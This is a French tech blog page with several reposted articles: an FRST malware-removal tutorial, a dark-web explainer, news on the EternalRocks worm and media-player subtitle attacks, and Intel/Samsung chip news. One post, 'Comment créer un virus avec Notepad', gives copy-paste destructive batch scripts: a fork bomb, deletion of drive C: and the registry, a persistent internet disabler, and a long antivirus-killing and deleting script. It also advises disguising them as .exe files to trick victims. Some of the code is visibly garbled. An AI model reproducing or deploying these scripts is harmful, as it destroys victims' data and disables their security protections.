Rechercher sur ce blogue

samedi 24 juin 2017

Cell volé : Vérifiez le statut d’un appareil

Vérifier un appareil Canada

Vérifier un appareil vous donne accès
instantanément au répertoire national
canadien d’appareils déclarés perdus
ou volés.
Vérifiez le statut d’un appareil
d’occasion avant de le vendre
ou de l’acheter.
Consommateurs
Vous achetez un appareil d’occasion? Vérifiez-en ici-même le numéro IMEI afin de vous assurer qu’il n’a pas été déclaré perdu ou volé au Canada.

FRST : L'outil de diagnostique,le tutoriel du Farbar Recovery Scan Tool (FRST)

FRST est un programme qui effectue un analyse de Windows et génère des rapports.
Ces rapports contiennent des points de chargements de Windows, les processus en cours d’exécution, une partie des DLL chargées en mémoire, les derniers fichiers modifiés dans le système et bien d’autres données.
A partir, d’une analyse de ces informations, il est possible de trouver certains logiciels malveillants et de les éradiquer.
La suppression se fait à partir d’un script de correction que l’on fournit à FRST et qui indique les fichiers, clés et autres éléments à supprimer de Windows.

Fabar Recovery Scan Tool (FRST) n’est pas un antivirus mais un outil de diagnostique comme OTL.
Le programme analyse  le système et génère un ou plusieurs rapports qui peuvent être analysés par exemple avec le service pjjoint afin de déceler des menaces informatiques (Trojan, Adwares etc).
Le tutoriel vous explique comment générer les rapports et les envoyer à http://pjjoint.malekal.com qui va vous retourner un lien à donner à l’interlocuteur qui vous aide.
Si vous avez été redirigé ici depuis un forum de désinfection, le but est de faire passer les rapports FRST à la personne qui vous aide à travers le service pjjoint afin que celui-ci puisse déterminer si l’ordinateur est infecté et éventuellement vous passer un “fix”, c’est à dire les commandes FRST qui vont bien pour désinfecter votre ordinateur.
Ce tutoriel est disponible sous forme de vidéo et en image.
Il est conseillé de suivre les deux… Ce n’est pas compliqué, prenez votre temps et lisez bien.



Lancer un scan FRST

Téléchargement FRST :
(Pour savoir si vous êtes en 32-bits ou 64-bits, lire la page : Comment vérifier si Windows est en 32-bits ou 64-bits)
Cliquez sur le bouton Download à droite pour obtenir le programme.
Si cela est plus simple, voici le tutoriel en vidéo, n’hésitez pas à suivre le tutoriel en image en parallèle :
SmartScreen peut émettre une alerte – vous pouvez forcer l’exécution en cliquant sur informations complémentaires puis exécuter quand même.
FRST_SmartScreen

Avast! et Norton peuvent bloquer le programme… Désactiver le, le temps de l’utiliser : clic droit sur l’icône en bas à droite côté de l’horloge puis Gestion des agents Avast => Désactiver définitivement.
FRST_detection_Avast_rk
FRST_detection_Avast_desactiver



Après avoir téléchargé le programme FRST, ce dernier doit se trouver dans votre dossier Téléchargement.
FRST doit être placé sur le bureau, pour cela :
  • Ouvrez le dossier de Téléchargement, faites un clic droit sur FRST puis Couper.
  • Placez vous sur votre Bureau en faisait clic droit puis Coller. (Attention à ne pas créer un raccourci de l’application FRST)
  • Cela va placer FRST sur le bureau.
Tutorial_FRST_deplacer_bureau
Tutorial_FRST_deplacer_bureau2
  • Lancez FRST qui se trouve maintenant sur votre bureau.
  • Accepter les modifications de l’ordinateur en cliquant sur Oui.
  • Acceptez les Clauses de non responsabilité (Dislaimer) en cliquant sur le bouton YES.
  • FRST_FR_DislaimerFabar_FRST
  • Cochez les options comme indiqué dans la fenêtre ci-dessous (à savoir il faut cocher Shortcut.txt qui ne l’est pas par défaut).
  • Cliquez sur le bouton Analyser/Scan pour démarrer l’analyse.
  • L’analyse se lance, les éléments scannés apparaissent en haut.
Version Française :
FRST_FR
Version en anglais :
FRST

Une fois le scan terminé, les rapports s’ouvrent sur le bloc-note : FRST.txt, Shortcut.txt et Addition.txt Fabar_FRST3
  • Ces trois rapports se trouvent sur le bureau avec le programme FRST.
    Fabar_FRST4
Si vous vous faites aider sur un forum : Ne copier/coller pas les rapports pas directement sur le forum, utilisez pjjoint pour les transmettre.
Allez sur le site http://pjjoint.malekal.com afin d’y déposer les rapports pour une consultation par un tiers.
Le principe est simple, vous envoyez chacun des rapports, à chaque fois un lien menant à ces rapports vous sera donné. Il faut donner ce lien à votre interlocuteur afin qu’il puisse lire les rapports.

  • Sur pjjoint, dans la partie, Chemin du fichier à soumettre, cliquez sur Parcourir.
  • Sélectionnez le fichier FRST.txt qui se trouve sur votre bureau.
Tutorial_FRST_pjjoint
Cliquez sur Envoyer le fichier :
Tutorial_FRST_pjjoint2
Le site pjjoint, vous donne en retour un lien qui mène à ce rapport afin d’être consulter.
Le but est de transmettre ce lien à votre interlocuteur, pour cela : Il suffit pour cela, de faire un clic droit sur le lien donné par pjjoint puis “Copier l’adresse du lien”.
Tutorial_FRST_pjjoint3
En réponse sur le forum, dans un nouveau message, faites un clic droit et coller.
Répétez l’opération pour le fichier Additionnal.txt et transmettez le  lien pjjoint de votre rapport Additionnal.txt

Voici un exemple de ce que cela donne au final :
Tutorial_FRST_pjjoint4

Correction (fix) avec FRST

Si vous vous faites aider sur un forum, il est possible que l’on vous fournisse un script qui permet d’être joué par FRST afin d’effectuer des commandes, notamment pour supprimer des éléments malicieux sur votre ordinateur.
Le script est transmis en retour de réponse des rapports donnés précédemment.
Tutorial_FRST_fixLe script donné doit être enregistré dans un fichier fixlist.txt qui doit se trouver dans le même dossier que le programme FRST.
FRST doit se trouver sur votre bureau, il faut donc enregistrer le fichier fixlist.txt sur le bureau.
Pour cela :
  • Ouvrez le Bloc-Note- Touche Windows +R et dans le champs exécuter, saisir notepad et OK.
  • C’est un éditeur de texte vide, Coller le script que l’on vous a fourni.
Ci-dessous un exemple de script :
FRST_fixCliquez sur le menu Fichier puis Enregistrez-sous :
1/ Placez-vous sur le bureau en cliquant sur bureau à gauche.
2/ Saisir dans le nom du fichier : fixlist.txt
3/ Cliquez sur le bouton Enregsitrer : fixlist.txt est enregistré sur le bureau.
FRST_fix_suite Relancez FRST qui doit aussi se trouver sur votre bureau.
Cliquez sur le bouton Corriger / fix. La correction doit s’effectuer, il est possible que la correction nécessite le redémarrage de l’ordinateur.
FRST_FR_Corriger
FRST_Fix
Si vous avez une erreur “fixlist.txt not found”, cela signifie que FRST ne trouve pas le fichier fixlist.txt
Soit vous n’avez pas enregistré le fichier sous le nom fixlist.txt, soit le fichier fixlist.txt ne se trouve pas dans le même dossier que FRST.
Encore une fois, FRST et fixlist.txt doivent se trouver sur votre bureau.

Note informative

FRST créé un dossier C:/FRST dedans se trouvent un dossier Logs où sont automatiquement enregistrés les rapports mais aussi un dossier Quarantine où se trouve les fichiers qui ont été supprimés depuis l’application.
Fabar_FRST7

Farbar et CD Live Malekal

Si le programme est executé en environnement CD Live, ce dernier va scanner le Windows hôte (comme le fait OTLPE).
Cela permet de générer un rapport depuis un environnement CD Live afin de diagnoster les infections et les faire supprimer.
Se reporter au paragraphe FARBAR sur la page CD Live Malekal : https://www.malekal.com/2013/02/22/malekal-live-cd/
Maleka_CD_Live_Farbar3

Désinfection FRST autonome

Se rendre sur le tutoriel : Désinfection manuelle de Windows (Trojan, Adware etc)
Tout y est expliqué afin d’analyser les rapports FRST et produire le fixlist.txt en conséquence.

Lien connexes à la désinfection virale

Désinfection virus :
REF.:

The Dark Web: la face criminelle de l'internet

Vous pouvez y acheter de la drogue, y échanger des armes ou y louer les services d'un pirate : en quelques clics en effet, vous pouvez accéder à la face cachée de l'internet. Voyage au centre de ce web invisible, un monde impitoyable en ligne sur lequel les pouvoirs publics et la police n'ont que peu d'impact.


© Getty Images/iStockphoto

Précisons tout d'abord que le Dark Web et le Deep Web sont deux choses différentes. En effet, le terme Deep Web s'applique essentiellement aux pages qui ne sont pas indexées par les moteurs de recherche comme Google. Et donc aussi les pages web qui ne sont accessibles qu'avec un mot de passe et ne sont donc pas ouvertes au grand public.
En revanche, le Dark Web concerne les pages non-indexées qui ne sont visibles qu'avec un navigateur spécial anonymisé, comme Tor. Le réseau Tor assure cette anonymité grâce à des 'noeuds' différents, des serveurs informatiques gérés par des milliers de bénévoles. Les données transmises avec un navigateur Tor sont d'abord consolidées au sein de paquets cryptés dans lesquels toutes les informations susceptibles d'identifier l'expéditeur sont supprimées. Sur le trajet vers leur destination, ces informations transitent ensuite par toute une série de 'noeuds' où elles sont à nouveau cryptées et 'emballées' dans de nouveaux paquets. Les différentes couches de cryptage rendent pratiquement impossible le traçage de la source du paquet en question.

A vos propres risques

Notre guide dans le Dark Web est Olivier Bertrand, expert en sécurité chez Trend Micro. Mais avant de partir, conseille-t-il, quelques mesures de prudence s'imposent. Car l'internaute moyen n'y a pas sa place. En effet , si accéder au Dark Web n'a rien d'illégal, l'utilisateur n'en prend pas moins certains risques. En effet, nous ne serez jamais bien loin d'un site de vente d'armes ou de drogues notamment. Selon Bertrand, mieux vaut donc ne pas cliquer sur des liens qui paraissent suspects, ou tout au moins plus suspects que le reste, d'autant qu'ils peuvent renfermer des malwares et autres virus. Vous surferez donc à vos propres risques et périls.

Voyage au centre de ce web invisible, un monde impitoyable en ligne
Voyage au centre de ce web invisible, un monde impitoyable en ligne © Getty Images/iStockphoto
Quoi qu'il en soit, la première étape consiste à télécharger le navigateur Tor, lequel est largement disponible sur l'internet et aussi facile à installer que Spotify par exemple. Il est préférable de ne pas utiliser Tor avec son propre système d'exploitation, mais de se doter par exemple de la distribution Linux Tails, laquelle est configurée pour optimiser le réseau Tor et peut tourner sur un clé USB. Ou d'installer un desktop virtuel sur votre ordinateur grâce à un logiciel comme VMware.
Deux bonnes raison à cela. D'abord, vous serez plus en sécurité puisque vous travaillerez dans un environnement distinct qui permet de protéger vos fichiers et données personnels des malwares et autres logiciels malveillants. Ensuite, votre vie privée s'en trouvera aussi sécurisée. Car si le navigateur Tor permet certes de surfer en tout anonymat, certains fichiers n'en sont pas moins stockés au niveau local qui permettent de contrôler votre activité.

Ebay pour criminels

Une fois Tor lancé, l'important consiste à trouver une page de recherche intéressante, une sorte de Google du Dark Web en somme. A partir de là, tout est pratiquement possible. Ainsi, il est possible d'accéder à l'Ebay du Dark Web pour y remplir votre panier criminel de fausses cartes de crédit, d'argent contrefait ou de passeports falsifiés. A titre d'exemple, une fausse carte d'identité belge revient à 275 ? seulement. Tous les paiements se font de manière totalement anonyme avec des bitcoins.
En louant les services d'un pirate, il est possible d'anéantir la réputation d'une personne, de faire de l'espionnage économique ou de collecter des informations personnelles. Le pirate affirme pouvoir installer de la pédopornographie sur l'ordinateur de la personne de votre choix, de ruiner sa situation financière ou de le faire arrêter. Les petites missions, comme le piratage d'un courriel ou d'un compte Facebook, coûte 200 euros. Et pour les opérations plus complexes, comme l'espionnage, il vous en coûtera au moins 500 euros.

Partager
Les prix varient de 23 euros pour un cheval de Troie capable de dérober un mot de passe à 1.650 euros pour un rançongiciel.
Vous pourrez également acheter des logiciels malveillants comme des rançongiciels, des chevaux de Troie, des enregistreurs de frappe ou des attaques DDoS. Les prix varient de 23 euros pour un cheval de Troie capable de dérober un mot de passe à 1.650 euros pour un ransomware. Des comptes de streaming pirates sur Netflix sont vendus à 10 cents. A la recherche d'un cadeau ? Cartes de voeux en ligne, billets d'avion avec réservation d'hôtel ou cartes frequent flyer sont en vente à des prix largement inférieurs aux montants réels. De même, toutes sortes d'armes, comme des mitrailleuses ou des lance-fusées sont aussi en vente libre.
Le règlement de la transaction se fait en général via un 'escrow service', un intermédiaire qui bloque le transfert de bitcoins si le client n'est pas satisfait de son achat. Cette solution permet d'éviter que tant l'acheteur que le vendeur ne soit dupé par une place de marché anonyme.

Totalement anonyme?

Les utilisateurs sont-ils totalement anonymes et invisibles aux yeux de la loi ? Pas toujours. Selon Bertrand, il est possible, en y mettant le temps et les moyens nécessaires, d'identifier les personnes. Ainsi, la Chine et les Etats-Unis collaborent avec les fournisseurs d'accès à des 'sniffers' capables de surveiller et d'analyser le trafic de données. Mais d'autres pays ne disposent pas de ce type d'infrastructure coûteuse. Parfois, il est plus facile d'attendre que les criminels commettent une faute, comme l'utilisation du même surnom sur l'internet classique et le Dark Web. C'est ce type de corrélation qui aurait permis de démasquer l'exploitant de Silk Road, autrefois l'une des places de marché les plus connues du Dark Web.

The Dark Web: la face criminelle de l'internet
De même, les entreprises spécialisées en cybersécurité comme Trend Micro analysent le Dark Web. Grâce à des algorithmes automatisés, les liens vers les logiciels potentiellement dangereux sur le Dark Web sont analysés : le code est comparé aux menaces déjà existantes et, lorsqu'il existe au moins une similitude partielle, le logiciel est catalogué comme une menace possible. Bref, cette partie cachée de l'internet est également surveillée. Même si la différence reste marquante avec l'internet classique où le moindre mouvement semble suivi par les entreprises privées et les autorités publiques.
Ce ne sont d'ailleurs pas uniquement les criminels qui surfent sur le Dark Web. C'est ainsi que des journalistes y ont installé un réseau pour communiquer avec leur rédaction dans des zones où l'internet est bridé. De même, dans les pays dictatoriaux, le Dark Web est parfois utilisé pour communiquer librement. Tandis que des lanceurs d'alerte comme Edward Snowden ou Julian Assange ne peuvent se passer de ce type de réseau.
Reste que pour chaque activiste qui utilise ce réseau comme un outil pour rendre le monde meilleur, il existe des criminels qui l'exploite pour des activités délictueuses. Dans cet internet de l'ombre, la police, les criminels, les activistes et les pouvoirs publics jouent au jeu du chat et de la souris, lequel n'est pas prêt de s'arrêter.

REF.:

Un nouveau ver exploite sept failles découvertes par la NSA (contre deux seulement pour WannaCry)





23/05/17
Des chercheurs ont repéré un nouveau maliciel (malware) exploitant pas moins de sept failles de la NSA. Chaque brèche avait été décelée par la NSA, puis dévoilée par le groupe de hackers The Shadow Brokers. WannaCry n'exploitait pour sa part que deux de ces bugs.



Le nouveau ver a été découvert en premier lieu par Miroslav Stampar, un membre du CERT (computer emergency response team) croate. Les plus anciennes traces du virus remontent au 3 mai déjà, selon l'expert en cyber-sécurité sur Github. Stampar a découvert Eternalrocks (comme il s'appelle) au moyen d'un 'honeypot' (pot de miel ou piège à pirates) Windows 7. Un honeypot est un système informatique rendu sciemment vulnérable et surveillé, afin d'intercepter et d'analyser de nouvelles menaces.
EternalRocks utilise ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE et ETERNALSYNERGY pour infecter de nouveaux ordinateurs. SMBTOUCH et ARCHITOUCH sont, elles, exploitées pour rechercher de nouvelles victimes, et DOUBLEPULSAR pour se propager vers d'autres machines. Ces sept failles avaient été décelées par la NSA américaine. WannaCry, le rançongiciel qui a fait dernièrement plus de 240.000 victimes, n'exploitait pour sa part qu'ETERNALBLUE et DOUBLEPULSAR.
Contrairement à WannaCry, ce maliciel passe provisoirement inaperçu aux yeux des utilisateurs. Dans un premier temps, EternalRocks télécharge le navigateur Tor pour établir une connexion privée avec les serveurs cachés du ver. Ce n'est que le lendemain que l'infection commence à se propager. Cela a probablement pour but de mettre les experts en cyber-sécurité sur une mauvaise piste, étant donné que rares sont ceux qui attendent un jour complet une réponse du serveur caché. Dans une autre tentative de mystifier les experts, le maliciel s'appelle lui-même aussi WannaCry.
Provisoirement, le ver se propage en grand secret, sans entreprendre d'action. On ne sait de la sorte pas combien d'ordinateurs sont déjà infectés. Stampar met toutefois en garde contre le fait qu'EternalRocks peut être activé à tout moment, afin d'acheminer des maliciels sur tout système contaminé. Plus vite l'utilisateur met à jour son ordinateur au moyen des plus récents correctifs, mieux c'est donc.

REF.:

Athena, le malware qui permet à la CIA d'espionner tous les Windows

Révélée par WikiLeaks, cette plate-forme de malwares est capable de cibler tous les PC, de Windows XP à Windows 10. Elle a été développée par une société privée pour le compte de la CIA.

jeudi 22 juin 2017

Comment créer un virus avec Notepad



Comment créer un virus dangereux avec Notepad ,pour contre-attaquer un Hacker !


 Les virus sont des logiciels malveillants qui peuvent causer beaucoup de dommages à P.C., ordinateur et ordinateur portable. Habituellement, ils se répandent grâce au partage de fichiers spécialement sur Internet. Le partage de fichiers Torrents et les pièces jointes aux courriers électroniques sont des moyens courants de propagation d'un virus.
 
Avant d'entrer dans les détails, permettez-moi d'expliquer quel est un fichier batch? Il s'agit simplement d'un fichier texte contenant des séries de commandes exécutées automatiquement, ligne par ligne, lorsque le fichier batch s'exécute. J'ai utilisé plusieurs virgules pour diviser la phrase en plusieurs parties pour faciliter la compréhension.
 
Ainsi, en utilisant Batch File, vous pouvez créer des virus extrêmement dangereux pour supprimer les fichiers Windows, formater différents lecteurs (C:, D:, E :), voler des informations, désactiver les pare-feu.
 
Maintenant, voici quelques virus de fichiers par lots, mais extrêmement dangereux. Vous devez simplement appuyer sur Ctrl + C (Copier) et Ctrl + V (Coller) dans le Bloc-notes. Ensuite, enregistrez le fichier du bloc-notes comme "anyname.bat". Assurez-vous d'utiliser '.bat' comme extension, sinon cela ne fonctionnera pas.


1. Application Bomber:-
@echo off
😡
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
Fonction: une fois exécuté, il va commencer à ouvrir plusieurs applications à plusieurs reprises, ce qui affectera les performances du système. Vous pouvez également ajouter une application de votre choix dans le code ci-dessus.

2. Folder Flooder-

@echo off
😡
md %random%
/folder.
goto x
Fonction: une fois exécuté, il va commencer à générer des dossiers dont le nom peut être n'importe quel nombre aléatoire.

3. User Account Flooder:-

@echo off
:xnet
user %random% /add
goto x
Fonction: une fois exécuté, il va commencer à créer des comptes utilisateur Windows dont le nom peut être un nombre aléatoire.

4. Process Creator:-

%0|%0
Fonction: - Une fois exécuté, il commencera à générer un grand nombre de processus très rapidement entraînant une suspension de P.C.

5. Internet Disabler:-

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE
Fonction: une fois exécuté, il désactive la connexion Internet d'un ordinateur en permanence.

6. O.S. Hacker:-

@Echo off
Del C: *.* |y
Fonction: - Une fois qu'il sera exécuté, il formatera le lecteur de disque C et entraînera donc la suppression de l'O.S. Vous pouvez également remplacer C par n'importe quel lecteur de votre choix.

7. Registry Deleter:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE
Fonction: - Une fois exécuté, il supprime les fichiers de registre et laisse un message. Cela peut très affecter l'ordinateur de la victime.

8. Crazy Caps Lock:-

Set wshShell
=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Fonction: - Une fois qu'il est exécuté, il sera activé et désactivé par Caps Lock en cas d'ennui de l'utilisateur.

9. Anti Virus Disabler:-

@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.datcls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda
software*.*
rem

Fonction: - Une fois exécuté, il désactivera Anti Virus du système de la victime.

L'inconvénient d'un fichier batch est que n'importe qui peut l'ouvrir avec un bloc-notes et lire la commande facilement. En outre, tout le monde peut le supprimer s'il le juge nuisible. Ainsi, pour surmonter la limitation / inconvénient, vous pouvez utiliser un outil cool nommé 'Batch to Exe Converter'. Il convertira l'extension '.bat' en extension '.exe'. Et votre fichier Batch sera converti en un fichier d'application. Vous pouvez facilement convaincre votre victime d'ouvrir le fichier.
Un message personnel à vous
C'est agréable de voir que vous avez passé par «Post Facebook Status in Future» complètement. J'espère que vous avez apprécié cet article. Cependant, si vous voulez que je livre des tutoriels et des articles de piratage plus intéressants, merci de partager mes postures. Vous pouvez utiliser le Widget de partage social fourni à la fin de chaque publication. Après tout, le partage est pris en charge !!!
Je vous remercie. Avoir une belle journée à l'avance!!!


REF.:

Samsung gravera les composants de nos smartphones en 4nm d’ici trois ans

La société coréenne vient de dévoiler une roadmap très volontariste pour les trois à quatre années à venir. L’objectif est d’introduire une nouvelle technologie pour remplacer le FinFET et d’atteindre progressivement le plancher incroyable des 4 nm.

Piratage par les sous-titres de vos lecteurs VLC, Kodi, Popcorn Time et Stremio



Faites attention! Ils peuvent vous pirater à travers des sous-titres pendant que vous regardez des films
Les sous-titres malvaillants peuvent permettre aux pirates informatiques de compromettre votre ordinateur et peut-être votre téléviseur tout en regardant des films.
Les chercheurs de sécurité de Check Point ont annoncé un nouveau vecteur d'attaque qui affecte et menace des millions d'utilisateurs à travers le monde. En créant des fichiers de sous-titres malveillants, qui sont ensuite téléchargés par le lecteur multimédia d'une victime, les pirates peuvent compromettre les appareils utilisateurs via des vulnérabilités trouvées dans les lecteurs multimédias populaires tels que VLC, Kodi, Popcorn-Time et Stremio. Environ 200 millions de lecteurs vidéo et de streamers qui exécutent actuellement les programmes vulnérables, ce qui rend cette attaque la plus répandue. Les chercheurs de sécurité de Check Point croient que des défauts de sécurité similaires existent également dans les autres lecteurs multimédias.
La vidéo suivante montre comment les victimes peuvent être piratées par des sous-titres méchants (suspects) en utilisant l'un des lecteurs multimédias affectés, où le code malveillant caché s'exécute une fois que le film est joué. Sur le côté droit de l'écran se trouve l'ordinateur de l'attaquant, qui exécute le système d'exploitation pirate, Kali Linux qui attend que l'ordinateur de la victime se connecte à son ordinateur.
Les chercheurs de Check Point ont déjà signalé les vulnérabilités aux développeurs des applications VLC, Kodi, Popcorn Time et Stremio. Les utilisateurs sont invités à mettre à jour leur logiciel de lecteur multimédia dès que possible.


REF.:

Intel Coffee Lake : une huitième génération de Core toujours en 14nm





La huitième génération de processeurs Intel Core, nom de code du Coffee Lake, sera lancée dans la deuxième moitié de 2017. Plus tôt que prévu, mais avec une gravure en 14nm.

Plus tôt ce mois-ci, Intel a levé quelques interrogations pendant une conférence dédiée aux investisseurs : la huitième génération d’Intel Core, qui répond au doux nom de Coffee Lake, prendra le relais du Kaby Lake dès le second semestre 2017. Intel aurait donc accéléré la commercialisation de sa solution, et promet une amélioration des performances d’environ 15 % par rapport à la génération précédente. Par contre, la conséquence de ce changement de feuille de route est visible : la gravure sera en 14nm. Ce sont des puces que l’on pourrait retrouver à termes sur quelques netbooks et Chromebooks haut de gamme sous Android ou Chrome OS.

Il faudra encore patienter jusqu’à 2018 pour les gravures plus fines, avec du 10nm en 2018. A priori, le 10nm sera donc réservé à Cannon Lake, une solution très attendue, surtout face à son principal concurrent : AMD.
En effet, AMD va lever les voiles sur Ryzen en mars prochain. Ryzen mettra en vedette huit cœurs et 16 threads dans sa partie haut de gamme, avec des versions à six et quatre cœurs sur le reste de la gamme. AMD pourrait se refaire une santé, avec une solution aussi puissante que l’Intel Core i7 6900K, mais avec un TDP plus faible et des prix plus bas. Le tout avec une gravure de 14nm.

Du côté des puces ARM, Qualcomm, Samsung et Apple préparent l’arrivée des premières puces gravées en 10nm. Le Qualcomm Snapdragon 835 sera d’ailleurs la première puce commercialisée avec cette finesse de gravure.

REF.:

Intel: Les CPU Core i9 pour la première fois avec une bête de 18 noyaux



La nouvelle série Core X d'Intel présente les CPU Core i9 pour la première fois avec une bête de 18 noyauxIntel a annoncé sa nouvelle gamme de processeurs série Core X basés sur les architectures Skylake-X et Kabylake-X. Avec les versions mises à niveau des processeurs Core i5 et i7, la série présente également quatre CPU Core i9 pour la première fois. Le nouveau phare Intel Core i9 Extreme, qui est publié séparément, comporte 18 cœurs.Il s'est avéré que les rumeurs concernant les nouveaux processeurs Core i9 d'Intel étaient réellement vraies. Chez Computex 2017, le géant du silicium a annoncé une nouvelle génération de la famille de processeurs appelée Intel Core X-Series. Il apporte des versions plus puissantes des CPU de base Core-i5 et Core-i7 existantes ainsi que les nouvelles CPU Core-i9.La plupart des processeurs Core X sont construits en utilisant la version améliorée de l'architecture ancienne d'Intel, connue sous le nom de Skylake-X qui gère la plupart des CPU dans le dernier catalogue de version. Il y a aussi des processeurs Kaby Lake-X, mais il n'y a pas beaucoup de puissant et il n'y a que l'option CPU 4-core. Toutes ces CPU de la famille Intel Core X seront installées dans le socket LGA 2066, aussi appelé Socket R4.Il y a aussi des processeurs Kaby Lake-X, mais ils ne sont pas très puissants et il n'y a que l'option CPU 4-core. Toutes ces CPU de la famille Intel Core X seront installées dans le socket LGA 2066, aussi appelé Socket R4.
Intel a également lancé le nouveau chipset X299 pour continuer avec les processeurs de la série X. La société présentera les cartes mères X299 à base de chipset dans les prochains jours.En ce qui concerne le prix, il commence à partir de 242 $ pour Intel Core i5-7640X (4 cœurs, 4 fils) et va jusqu'à 1699 $ pour Intel Core i9-7960X (16 noyaux, 32 threads).Intel Core X 2Crédit: IntelIntel affirme que la série Core X s'adresse aux professionnels et aux amateurs de jeux. Les processeurs prennent en charge la mémoire DDR4 à double canal (Kaby Lake-X) et quad-canaux et sont parfaits pour une multitude de besoins tels que le jeu 12K et l'édition vidéo, un support VR amélioré utilisant de multiples GPU discrets et des écrans.Intel Core XCrédit: IntelPour une amélioration accrue des performances, Intel a introduit Turbo Boost Max 3.0, qui, dans le cas de Core i9, augmente la fréquence d'horloge à 4,5 GHz.Intel affirme que ces processeurs sont supérieurs à ceux de la génération précédente. Ils sont 10% plus rapides pendant le traitement multithread et 15% pendant le traitement du thread unique.Les CPU Core X peuvent avoir jusqu'à 44 lignes PCIe 3.0 permettant aux utilisateurs de profiter des cartes graphiques externes, des SSD plus rapides et de l'interface Thunderbolt 3. Intel a récemment annoncé qu'ils rendraient Thunderbolt 3 sans redevance et serait intégré dans les futures CPU.Intel Core i9 ExtremeIntel Core i9 extremeCrédit: IntelCore i9 Extreme, avec 18 cœurs et 36 fils, est libéré séparément de la série Core X. Le processeur de bureau phare d'Intel est livré avec un prix de $ 1,999 qui dépasse largement le budget d'un rêveur. Évidemment, ce n'est pas destiné à eux.


Bientôt, nous acheterons des PC équipés d'une famille de processeurs haut de gamme Intel. L'entreprise s'est associée à divers fabricants de matériel informatique tels que Dell, Asus, Gigabytes, HP, Acer, MSI, Origin etc. et Amazon pour la vente de processeurs autonomes.8ème génération de processeurs Intel CoreIntel a également laissé tomber quelques nouvelles sur les 8ème processeurs Intel Core à venir, basés sur l'architecture de 14nm Coffee Lake d'Intel. La société affirme, selon les derniers résultats d'essais, que leurs processeurs de prochaine génération ont maintenant une performance d'environ 30% que les processeurs actuels basés sur l'architecture de Kaby Lake.


REF.:

1000 tutoriels sur les tours de piratage populaires





1000 tutoriels sur les tours de piratage populaires

 
13 juin 2017 Par Anshul 


 
1000 collections de piratage, ce sont les meilleurs et les plus populaires des astuces de piratage Ces tutoriels sont pris en charge par Windows Vista, sept et xp (encore beaucoup de personnes utilisant cet os), vous obtiendrez également un article de connaissances sur le réseautage , Comment devenir un pirate informatique, et beaucoup de choses liées au piratage.

Ce tutoriel comprend

* Trucs de piratage éthique
* Trucs de piratage de Windows
* Trucs de piratage du registre
* Cryptographie, etc.

Je souhaite vous informer que je ne suis pas auteur ou propriétaire de ces collections de tutoriels de piratage, je viens de modifier certains didacticiels afin de télécharger à partir d'un lien donné ci-dessous et de profiter de ces tutoriels

